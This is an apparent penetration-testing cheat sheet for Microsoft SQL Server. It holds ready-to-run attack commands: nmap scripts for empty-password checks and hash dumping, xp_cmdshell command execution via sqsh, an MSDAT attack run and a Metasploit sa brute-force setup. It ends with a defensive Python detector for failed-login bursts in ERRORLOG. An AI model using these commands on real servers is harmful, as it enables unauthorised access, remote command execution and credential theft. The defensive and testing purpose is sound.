Nmap Information Gathering:
nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip
sqsh – Interactive database shell:
# Log in to mssql
sqsh -S 192.168.1.101 -U sa
# Execute commands
xp_cmdshell 'date'
go
MSDAT (Microsoft SQL Database Attacking Tool):
An open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.
https://github.com/quentinhardy/msdat
python msdat.py all -s 192.168.1.101
MSSQL Brute Force Attack:
The Metasploit module simply tries each user/password pair from the supplied lists against the MSSQL instance (the default is sa with a blank password).
use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set rhosts 192.168.1.104
msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(mssql_login) > run
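On the defending side, the login attempts that mssql_login or msdat generate show up as error 18456 entries in the SQL Server ERRORLOG. This added example (not from the page or from any of the tools above) parses constructed ERRORLOG lines and flags a client address that accumulates several failed logins within a short window; the timestamps, user names and addresses in the sample are made up.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of SQL Server ERRORLOG "Login failed" lines (error 18456). In a real log each
# one is preceded by an "Error: 18456, Severity: 14, State: N." line, which this parser ignores.
SAMPLE_ERRORLOG = """\
2024-01-15 10:02:11.10 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.104]
2024-01-15 10:02:11.35 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.104]
2024-01-15 10:02:11.60 Logon       Login failed for user 'admin'. Reason: Could not find a login matching the name provided. [CLIENT: 192.168.1.104]
2024-01-15 10:02:11.90 Logon       Login failed for user 'backup'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.104]
2024-01-15 10:02:12.20 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 192.168.1.104]
2024-01-15 10:30:00.00 Logon       Login failed for user 'appuser'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.7]
"""

LOGIN_FAILED = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<ip>[^\]]+)\]"
)

def parse_failed_logins(text):
    """Return a list of (timestamp, user, client_ip) tuples, one per 'Login failed' line."""
    events = []
    for line in text.splitlines():
        m = LOGIN_FAILED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["ip"]))
    return events

def detect_bruteforce(events, threshold=5, window_seconds=60):
    """Sliding window per client IP: an IP is flagged once it accumulates `threshold` failed
    logins within `window_seconds`. Returns {client_ip: sorted usernames tried} for flagged IPs."""
    recent = defaultdict(deque)  # client_ip -> deque of (timestamp, user) inside the window
    flagged = {}
    for ts, user, ip in sorted(events):
        q = recent[ip]
        q.append((ts, user))
        while (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            flagged[ip] = sorted({u for _, u in q})
    return flagged

if __name__ == "__main__":
    for ip, names in detect_bruteforce(parse_failed_logins(SAMPLE_ERRORLOG)).items():
        print(f"possible MSSQL brute force from {ip}: logins tried {names}")
```

Repeated failures for sa from one address are the signature of the default sa/blank check above; a burst spanning several login names points at the user_file/pass_file run.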